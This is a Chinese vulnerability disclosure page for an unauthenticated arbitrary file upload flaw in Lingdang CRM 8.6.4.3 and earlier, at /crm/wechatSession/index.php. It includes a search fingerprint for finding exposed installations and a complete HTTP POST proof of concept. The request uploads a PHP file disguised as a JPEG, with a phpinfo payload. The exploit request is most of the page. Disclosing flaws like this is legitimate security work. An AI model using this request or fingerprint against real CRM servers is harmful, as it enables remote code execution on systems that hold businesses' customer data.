【原创】上海灵当信息科技有限公司 Lingdang CRM <= 8.6.4.3 任意文件上传漏洞


当前为私密分享,无需登录即可查看。


时间 作者 可见性 等级 Rank
2024-11-04 10:56:04 Mstir 私密的 高危 3

无描述...


漏洞描述

- Summary

灵当CRM是一款专为中小企业打造的智能客户关系管理工具,由上海灵当信息科技有限公司开发并运营。广泛应用于金融、教育、医疗、IT服务、房地产等多个行业领域,帮助企业实现客户个性化管理需求,提升企业竞争力。无论是新客户开拓、老客户维护,还是销售过程管理、服务管理等方面,灵当CRM都能提供全面、高效的解决方案。

- Lingdang CRM is an intelligent customer relationship management tool specifically designed for small and medium-sized enterprises. It is developed and operated by Shanghai Lingdang Information Technology Co., Ltd. It is widely used in various industries including finance, education, healthcare, IT services, and real estate. Lingdang CRM helps businesses meet their customer personalization management needs and enhances their competitiveness. Whether it's about acquiring new customers, maintaining existing ones, or managing the sales process and service management, Lingdang CRM provides comprehensive and efficient solutions.

灵当CRM 8.6.4.3 存在任意文件上传漏洞,漏洞发生在/crm/wechatSession/index.php。

- LingDang CRM versions 8.6.4.3 and earlier are affected by an arbitrary file upload vulnerability, which occurs at /crm/wechatSession/index.php. This vulnerability can be exploited without requiring any special permissions.

资产测绘

body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")

POC

POST /crm/wechatSession/index.php?token=9b06a9617174f1085ddcfb4ccdb6837f&m
sgid=1&operation=upload HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,i
mage/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydi5972B2
9YvTnNyn
Cookie: PHPSESSID=sl03dj9rrc66erlu5c23jvng9n
Host: 127.0.0.1
Origin: http://127.0.0.1
Pragma: no-cache
Referer: http://127.0.0.1/crm/wechatSession/index.php?token=9b06a9617174f1
085ddcfb4ccdb6837f&msgid=1&operation=upload
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (
KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
<?php phpinfo();?>
------WebKitFormBoundary03rNBzFMIytvpWhy--

null


审核评价: 没有任何评价...